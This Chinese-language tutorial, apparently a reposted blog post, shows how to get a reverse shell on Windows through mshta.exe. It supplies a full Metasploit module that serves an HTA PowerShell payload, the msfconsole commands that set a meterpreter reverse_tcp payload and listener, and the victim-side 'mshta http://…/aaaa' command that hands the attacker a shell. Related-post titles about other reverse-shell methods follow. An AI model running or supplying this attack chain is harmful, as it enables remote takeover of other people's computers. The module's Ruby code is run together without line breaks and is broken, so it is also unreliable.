mshta 反弹shell
kali系统准备:
复制以下ruby代码到/usr/share/metasploit-framework/modules/exploits/windows/smb/msh_shell.rb目录(要注意代码缩进哦):
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##class MetasploitModule < Msf::Exploit::RemoteRank = NormalRankinginclude Msf::Exploit::Remote::HttpServerdef initialize(info = {})super(update_info(info,'Name' => 'Microsoft Office Payload Delivery','Description' => %q{This module generates an command to place withina word document, that when executed, will retrieve a HTA payloadvia HTTP from an web server. Currently have not figured out howto generate a doc.},'License' => MSF_LICENSE,'Arch' => ARCH_X86,'Platform' => 'win','Targets' =>[['Automatic', {} ],],'DefaultTarget' => 0,))enddef on_request_uri(cli, _request)print_status("Delivering payload")p = regenerate_payload(cli)data = Msf::Util::EXE.to_executable_fmt(framework,ARCH_X86,'win',p.encoded,'hta-psh',{ :arch => ARCH_X86, :platform => 'win '})send_response(cli, data, 'Content-Type' => 'application/hta')enddef primerurl = get_uriprint_status("Place the following DDE in an MS document:")print_line("mshta.exe \"#{url}\"")end
end
在命令行启动msf的服务:
service postgresql start
再启动msf:
sudo msfconsole
重新加载所有模块:
reload_all
查找我们刚刚新建的msh_shell模块:
search msh_shell
加载这个模块:
use exploit/windows/smb/msh_shell
使用反弹shellcode, 配置本机地址, 配置uri地址
set payload windows/meterpreter/reverse_tcp set lhost 192.168.0.105 set uripath aaaa exploit
window系统:
打开运行命令,执行:
mshta http://kali系统的IP/aaaa
kali系统就会收到一个window系统的shell
转载于:https://www.cnblogs.com/diligenceday/p/7906878.html
mshta 反弹shell相关推荐
- 渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Windows篇(゚益゚メ) 渗透测试
文章目录 反弹shell介绍 常用反弹方式 NetCat(NC)反弹 正向NC 反向NC mshta.exe利用 msf利用模块 方法一(msfconsole) 方法二(msfvenom) Cobal ...
- 网络安全-木马入侵windows -msfvenom反弹shell(CMD)
网络安全-木马入侵windows -msfvenom反弹shell(CMD) 前言 一,我也是初学者记录的笔记 二,可能有错误的地方,请谨慎 三,欢迎各路大神指教 四,任何文章仅作为学习使用 五,学习 ...
- 内网渗透之Windows反弹shell(一)
前言 作者简介:不知名白帽,网络安全学习者. 博客主页:https://blog.csdn.net/m0_63127854?type=blog 内网渗透专栏:https://blog.csdn.net ...
- msf反弹shell
今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享.( ̄︶ ̄)↗ 反弹shell的两种方法 第一种Msfvenom实例: 1.msfconsole #启动msf 2.msfvenom - ...
- cve-2018-2628 Weblogic反序列化漏洞实现反弹shell
测试机:MacBook-Air 测试机IP:192.168.0.100 靶机IP:192.168.0.100:7001 环境: docker 工具:CVE-2018-2628漏洞利用工具包 下载 一. ...
- java Runtime.getRuntime().exec 获取反弹shell
说明 前面写了一篇在Java环境下获取shell的文章.当时使用的语句是: Runtime r = Runtime.getRuntime(); Process p = r.exec(new Strin ...
- icmp反弹shell 简介
目录 第一节 轶事 第二节 技术原理 第三节 ICMP反弹shell 第一节 轶事 首次听说icmp隧道,要从免费上网说起.当年的网费还是挺贵的,大学生上个网还是容易"破产"呀.当 ...
- python3 利用eval反弹shell
在最近的python开发中 用到了 字符串转字典 使用了eval 这让我想起了php中的eval 搜索一下果然问题严重 既然有问题 那就来试试反弹shell吧 看看效果 搜索一下 找到了 python ...
- linux下几种反弹Shell方法的总结与理解
实验环境 CentOS 6.5:192.168.0.3 kali2.0:192.168.0.4 方法1: 反弹shell命令如下: bash -i >& /dev/tcp/ip/port ...
最新文章
- 什么影响oracle io,Oracle IO问题解析
- WEB程序调用客户端程序
- Java之正則表達式【使用语法】
- VS2008环境下开发的某些程序在其他机器运行提示“由于应用程序配置不正确,应用程序未能启动”的问题(IIS)...
- JetBrains:webstrom中代码模板设置
- HanLP1.5.2 -python使用介绍
- 05-基础widgets
- 基于SSM和Vue的旅游网和旅游管理系统
- 如何修改图片尺寸,分辨率大小,三种方式对比。
- 《浪潮之巅》内容整理
- 基于时空注意力的图卷积网络在路段级交通预测中的应用
- Python Str字符串 字符串常用方法 定义 创建 拆分 成分判断 大小写调整 格式化 填充 替换 访问 查找
- 6个有效激励合作伙伴和促进推荐的小技巧
- 基于Go语言GoFrame+Vue+ElementUI的OA办公系统
- Eureka常见问题解答
- 如何修改安卓应用图标和程序名称
- 17开头的是什么号码?为什么17开头手机号最好不要用
- 【StoneDB join 算法分析】查询模块
- 永恩上线服务器维护,LOL网友爆料:劫将推出至臻皮肤,卢锡安赛娜情侣皮肤即将上线?...
- cad指北针lisp_建筑施工图常用符号及图例